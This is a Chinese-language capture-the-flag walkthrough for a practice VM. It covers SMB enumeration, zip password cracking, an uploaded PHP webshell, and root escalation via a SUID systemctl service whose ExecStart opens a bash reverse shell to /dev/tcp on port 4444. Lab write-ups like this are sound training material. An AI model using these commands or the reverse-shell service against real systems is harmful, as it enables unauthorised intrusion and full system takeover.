环境准备
靶机链接:百度网盘 请输入提取码
提取码:bucm
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息收集
1.探测目标靶机ip
arp-scan -l
2.用nmap探测目标靶机开放端口和服务情况
nmap -A -sV -p- 192.168.1.105
发现有smb服务 还有一个用户名 guest
漏洞利用
1.用smbmap登录
smbmap -H 192.168.1.105 //查看共享目录
smbclient '\\192.168.1.105\file' guest //登录用户
将文件下载下来
2.unzip解压的时候要密码
3.利用工具fcrackzip 可以解决解压有密码的情况!
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u website.zip
密码:porchman
4.解压出来进入目录
再进入sitemagic
5.进去之后随便看看 发现config.xml.php里面有用户名和密码
username:admin
password:jesse
6.用dirb扫描下目录 啥也没有
进入页面报404
7.因为咱们前面从website(网站的意思)进入的sitemagic目录 所以大有可能有这个网址
发现是一个cms 然后进行登录
8.进去之后开始探索 发现content下面有一个files 然后可以上传文件 我直接用msf工具生成php木马 ,直接就上传成功了
9.然后我们拼接他的路径 让木马执行起来
10.成功反弹shell
权限提升
1.还是老方法看下家目录下有没有惊喜
2.查看用户后没有可利用的价值
4.用find命令查找有suid执行权限的文件
find / -perm -u=s -type f 2>/dev/null
5.发现一个systemctl它是 Systemd 的主命令,用于管理系统
大部分的service(服务)都存放在/etc/systemd/system 下面,可以看到好多服务
6.因为systemctl有suid权限,所以可以创建一个systemctl service,里面写入反弹shell的命令,通过软链接,将创建的服务嵌入他的服务中,即可反弹shell
谷歌write systemctl service file
把内容复制下来,只要把中间的服务,改成反弹shell的命令即可。
7.从现在开始105为kali地址,靶机地址变成了103(期间重启过kali ip地址有所变化)
按照上面格式写
[Unit] Description=wuyu [Service] Type=oneshot ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.105/4444 0>&1' [Install] WantedBy=multi-user.target
8.切换到tmp目录下创建服务
我是把test.service文件放到了桌面 所以我之前开了一个http服务 用wget下载下来
9.执行systemctl link /tmp/test.service,发现没有这个目录,这是因为service这个命令跟tmp目录的权限有差异
可以用和tmp类似 能创建service的shm
cd /dev/shm
mv /tmp/test.service ./ //把文件移到当前目录
systemctl link /dev/shm/test.service //服务创建成功,下面提示软链接创建成功
10.nc -nlvp 444 开启监听 并且用start开启服务
成功反弹
11.进入root目录,直接拿下!!!